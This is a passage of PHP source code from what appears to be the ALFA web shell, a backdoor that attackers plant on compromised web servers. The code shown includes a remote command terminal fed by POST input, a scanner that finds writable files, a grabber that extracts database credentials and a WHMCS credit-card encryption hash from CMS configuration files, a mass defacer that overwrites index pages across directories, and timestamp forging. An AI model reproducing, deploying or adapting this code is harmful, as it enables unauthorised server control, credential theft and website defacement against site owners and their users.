 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
 }else{
 $file_size = @filesize($file->getPathname());
 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file",  "modify" => $file_modify, "size" => $file_size);
 }
 }
 function __alfa_open_archive_usort($a, $b){
 return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
 }
 usort($dirs, "__alfa_open_archive_usort");
 usort($files, "__alfa_open_archive_usort");
 $files = array_merge($dirs, $files);
 echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
 $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
 foreach($files as $file){
 $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
 if($file["type"] == "dir"){
 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
 }else{
echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";

}
 }
  echo '</table>';
}catch(Exception $e){
echo("0");
}
}
function alfaopen_archive_dir(){
$dir = $_POST["alfa1"];
$base_id = $_POST["alfa2"];
__alfa_open_archive_file($dir, $base_id);
}
function alfaconfig_grabber(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
if($_POST['alfa5']=='>>'){
echo __pre();
Alfa_ConfigGrabber($dir, $ext);
}
echo '</div>';
alfafooter();
}
function Alfa_ConfigGrabber($dir, $ext) {
$pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
$db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
if(@is_readable($dir)){
$globFiles = @glob("$dir/*.$ext");
$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)||@is_link($dir)) continue;
@Alfa_ConfigGrabber($dir, $ext);
}
foreach ($globFiles as $file){
$filee = @file_get_contents($file);
if(preg_match($pattern, $filee)){
echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
}
}
}
}
function alfasearcher(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
$method = $_POST['alfa4'];
if($_POST['alfa5']=='>>'){
echo __pre();
if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
Alfa_Searcher($dir,trim($ext),$method);
}
}
if($_POST['alfa1']=='str'){
echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$string = $_POST['alfa3'];
$ext = $_POST['alfa5'];
if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
echo __pre();
Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
}
}
echo '</div>';
alfafooter();
}
function alfaMassDefacer(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
$dir = $_POST['alfa1'];
$defpage = $_POST['alfa2'];
$method = $_POST['alfa3'];
$fCurrent = $GLOBALS['__file_path'];
if($_POST['alfa4'] == '>>'){
if(!empty($dir)){
if(@is_dir($dir)){
if(@is_readable($dir)){
if(@is_file($defpage)){
if($dh = @opendir($dir)){
echo __pre();
while (($file = @readdir($dh)) !== false){
if($file == '..' || $file == '.')continue;
$newfile=$dir.$file;
if($fCurrent == $newfile)continue;
if(@is_dir($newfile)){
Alfa_ReadDir($newfile,$method,$defpage);
}else{
if(!@is_writable($newfile))continue;
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}else{__alert('<font color="red">Error In OpenDir...</font>');}
}else{__alert('<font color="red">DefPage File NotFound...</font>');}
}else{__alert('<font color="red">Directory is not Readable...</font>');}
}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
}else{__alert('<font color="red">Dir is Empty...</font>');}
}
echo '</div>';
alfafooter();
}
function Alfa_ReadDir($dir,$method='',$defpage=''){
if(!@is_readable($dir)) return false;
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while(($file=readdir($dh))!==false) {
if($file == '..' || $file == '.')continue;
$newfile=$dir.'/'.$file;
if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
if(@is_file($newfile)){
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
if(!@is_writable($dir)) return false;
if(!@is_readable($dir)) return false;
$defpage=@file_get_contents($defpage);
if($m == 'index'){
$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
if(in_array(strtolower($file),$indexs)){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
}
}elseif($m=='all'){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."  <b><font color='red'>DeFaced...</b></font><br>" : '';
}
}
function alfaGetDisFunc(){
alfahead();
echo '<div class="header">';
$disfun = @ini_get('disable_functions');
$s = explode(',',$disfun);
$f = array_unique($s);
echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
$i=1;
foreach($f as $s){
$s=trim($s);
if(function_exists($s)||!is_callable($s))continue;
echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
$i++;
}
echo '</table></center>';
echo '</div>';
alfafooter();
}
function Alfa_Create_A_Tag($action,$vals){
$nulls = array();
foreach($vals as $key => $val){
echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
$f = implode(',',$nulls);
echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
unset($nulls);
}
}
function Alfa_Searcher($dir, $ext, $method) {
if(@is_readable($dir)){
if($method == 'all')$ext = '*';
if($method == 'dirs')$ext = '*';
$globFiles = @glob("$dir/*.$ext");
$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)||@is_link($dir)) continue;
@Alfa_Searcher($dir, $ext, $method);
}
switch($method){
case "files":
foreach ($globFiles as $file){
if(@is_writable($file)){
echo "$file<br>";
}
}
break;
case "dirs":
foreach ($globFiles as $file){
if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
echo dirname($file).'<br>';
$blacklist[] = dirname($file);
}
}
break;
case "all":
foreach ($globFiles as $file){
echo $file.'<br>';
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f,$width='100%',$height='600px'){
return('<iframe src="'.__ALFA_DATA_FOLDER__."/".$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
}
class AlfaCURL {
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = true;
public $curl_status = true;
function __construct($cookies=false,$compression='gzip',$proxy=''){
if(!extension_loaded('curl')){$curl_status = false;return false;}
$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if($this->cookies)$this->cookie($this->path);
}
function cookie($cookie_file) {
if (_alfa_file_exists($cookie_file,false)) {
$this->cookie_file=$cookie_file;
}else{
@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
$this->cookie_file=$cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url,$method="get",$data=""){
if(!$this->curl_status){return false;}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if($this->ssl){
curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
}
if($this->cookies){
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if($this->proxy){
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if($method=='post'){
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$return = @curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
die;
}
}
function getConfigHtml($cms){
$content = '';
$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
$content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
foreach($cms_array as $key => $val){
$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
}
$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
$content .= "</form>";
return $content;
}
if (!function_exists('json_encode')){
function json_encode($a=false){
if (is_null($a)) return 'null';
if ($a === false) return 'false';
if ($a === true) return 'true';
if (is_scalar($a))
{
if (is_float($a))
{
return floatval(str_replace(",", ".", strval($a)));
}

if (is_string($a))
{
static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
}
else
return $a;
}
$isList = true;
for ($i = 0, reset($a); $i < count($a); $i++, next($a))
{
if (key($a) !== $i)
{
$isList = false;
break;
}
}
$result = array();
if ($isList)
{
foreach ($a as $v) $result[] = json_encode($v);
return '[' . join(',', $result) . ']';
}
else
{
foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
return '{' . join(',', $result) . '}';
}
}
}
if ( !function_exists('json_decode') ){
function json_decode($json, $array=true){
$comment = false;
$out = '$x=';
for ($i=0; $i<strlen($json); $i++)
{
if (!$comment)
{
if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
else if ($json[$i] == ':'){$out .= '=>';}
else {$out .= $json[$i];}
}
else $out .= $json[$i];
if ($json[$i] == '"')$comment = !$comment;
}
eval($out . ';');
return $x;
}
}
function alfaterminalExec(){
$pwd = "pwd";
$seperator = ";";
if($GLOBALS['sys']!='unix'){
$pwd = "cd";
$seperator = "&";
}
if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
$current_path = '';
if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
if(empty($match[1])){
$match[1] = $match[2];
}
$current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
$current_path = str_replace("\\", "/", $current_path);
}
$out = alfaEx($cmd.$_POST['alfa1'], true);
$out = htmlspecialchars($out);
echo json_encode(array("output" => convertBash($out), "path" => $current_path));
}
function convertBash($code) {
$dictionary = array(
'[01;30m' => '<span style="color:black">',
'[01;31m' => '<span style="color:red">',
'[01;32m' => '<span style="color:green">',
'[01;33m' => '<span style="color:yellow">',
'[01;34m' => '<span style="color:blue">',
'[01;35m' => '<span style="color:purple">',
'[01;36m' => '<span style="color:cyan">',
'[01;37m' => '<span style="color:white">',
'[0m'   => '</span>'
);
$htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
return $htmlString;
}
function alfadoActions(){
$chdir_fals = false;
if(!@chdir($_POST['c'])){
$chdir_fals = true;
$alfa_canruncmd = _alfa_can_runCommand(true,true);
}
if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
$action = $_POST["alfa3"];
if($action == "permission"){
$perms = 0;
$perm = $_POST["alfa2"];
for($i=strlen($perm)-1;$i>=0;--$i){
$perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
}
if(@chmod($_POST['alfa1'], $perms)){
echo("done");
}else{
echo("no");
}
return;
}
if($action == "rename" || $action == "move"){
$alfa1_decoded = $_POST['alfa1'];
if($chdir_fals){
$_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
}
$_POST['alfa1'] = trim($_POST['alfa1']);
$alfa1_escape = addslashes($_POST["alfa1"]);
if($_POST["alfa3"] == "rename"){
$_POST['alfa2'] = basename($_POST['alfa2']);
}
if(!empty($_POST['alfa2'])){
$cmd_rename = false;
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
$cmd_rename = true;
$alfa1_escape = addslashes($alfa1_decoded);
alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
}
}
if(!file_exists($_POST['alfa2'])){
if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
echo "done";
}else{
echo "no";
}
}else{
echo "no";
}
}
}elseif($action == "copy"){
if(is_dir($_POST["alfa1"])){
$dir = str_replace('//', '/', $_POST["alfa1"]);
$dir = explode('/', $dir);
if(empty($dir[count($dir) - 1])){
$name = $dir[count($dir) - 2];
}else{
$name = $dir[count($dir) - 1];
}
}else{
$name = basename($_POST["alfa1"]);
}
$dir = dirname($_POST["alfa1"]);
if($dir == "."){
$dir = $_POST["c"]."/";
}
if(is_file($_POST["alfa1"])){
@copy($_POST["alfa1"], $_POST["alfa2"]);
echo("done");
}elseif(is_dir($_POST["alfa1"])){
if(!is_dir($_POST["alfa2"])){
mkdir($_POST["alfa2"], 0755, true);
}
copy_paste($dir, $name , $_POST["alfa2"] . "/");
echo("done");
}
}elseif($action == "modify"){
if( !empty($_POST['alfa1']) ) {
$time = strtotime($_POST['alfa1']);
if($time){
$touched = false;
if($chdir_fals&&$alfa_canruncmd){
alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
$touched = true;
}
if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
echo 'no';
}else{
echo 'ok';
}
} else{
 echo 'badtime';
}
}
}

}
function alfaget_flags(){
$flags = array();
if(function_exists("curl_version")){
$curl = new AlfaCURL();
$server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
$flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
$flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
if(strpos($flag2, "geoplugin") != false){
$flag = json_decode($flag, true);
$flag2 = json_decode($flag2, true);
if(!empty($flag['geoplugin_countryCode'])){
$flags["server"]["name"] = $flag['geoplugin_countryName'];
$flags["server"]["code"] = $flag['geoplugin_countryCode'];
}
if(!empty($flag2['geoplugin_countryCode'])){
$flags["client"]["name"] = $flag2['geoplugin_countryName'];
$flags["client"]["code"] = $flag2['geoplugin_countryCode'];
}
}
}
echo json_encode($flags);
}
function alfaGetConfig(){
$cms = $_POST['alfa1'];
$path = trim($_POST['alfa2']);
$config = array(
'wp'=>array('file'=>'/wp-config.php',
'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
),
'drupal'=>array('file'=>'/config.php',
'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
),
'drupal2'=>array('file'=>'/sites/default/settings.php',
'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
),
'vb'=>array('file'=>'/includes/config.php',
'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
),
'phpnuke'=>array('file'=>'/config.php',
'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
),
'smf'=>array('file'=>'/Settings.php',
'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'whmcs'=>array('file'=>'/configuration.php',
'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'joomla'=>array('file'=>'/configuration.php',
'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'phpbb'=>array('file'=>'/config.php',
'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'mybb'=>array('file'=>'/inc/config.php',
'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
)
);
if($cms == "drupal"){
$file = $config[$cms]['file'];
$file=$path.$file;
if(@is_file($file)||_alfa_is_dir($file,"-e")){
}else{
$cms = 'drupal2';
}
}
if($cms == "vb"){
$file = $config[$cms]['file'];
$file=$path.$file;
if(@is_file($file)||_alfa_is_dir($file,"-e")){
}else{
$path .= '/core';
}
}
$data = array();
$srch_host = $config[$cms]['host'][0];
$srch_user = $config[$cms]['dbuser'][0];
$srch_name = $config[$cms]['dbname'][0];
$srch_pw = $config[$cms]['dbpw'][0];
$prefix = $config[$cms]['prefix'][0];
$file = $config[$cms]['file'];
$chost = $config[$cms]['host'][1];
$cuser = $config[$cms]['dbuser'][1];
$cname = $config[$cms]['dbname'][1];
$cpw = $config[$cms]['dbpw'][1];
$cprefix = $config[$cms]['prefix'][1];
if(@is_dir($path)||_alfa_is_dir($path)){
$file=$path.$file;
}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
$file=$path;
}else{
return false;
}
$file = __read_file($file);
if($cms == "drupal2"){
$file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
}elseif($cms == "vb"){
$file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
}
if(preg_match($srch_host, $file, $mach)){
$data['host'] = $mach[$chost];
}
if(preg_match($srch_user, $file, $mach)){
$data['user'] = $mach[$cuser];
}
if(preg_match($srch_name, $file, $mach)){
$data['dbname'] = $mach[$cname];
}
if(preg_match($srch_pw, $file, $mach)){
$data['password'] = $mach[$cpw];
}
if(isset($prefix)){
if(preg_match($prefix, $file, $mach)){
$data['prefix'] = $mach[$cprefix];
}
}
if($cms=='whmcs'){
if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
$data['cc_encryption_hash'] = $mach[3];
}
}
echo json_encode($data);
}
if(empty($_POST['a']))
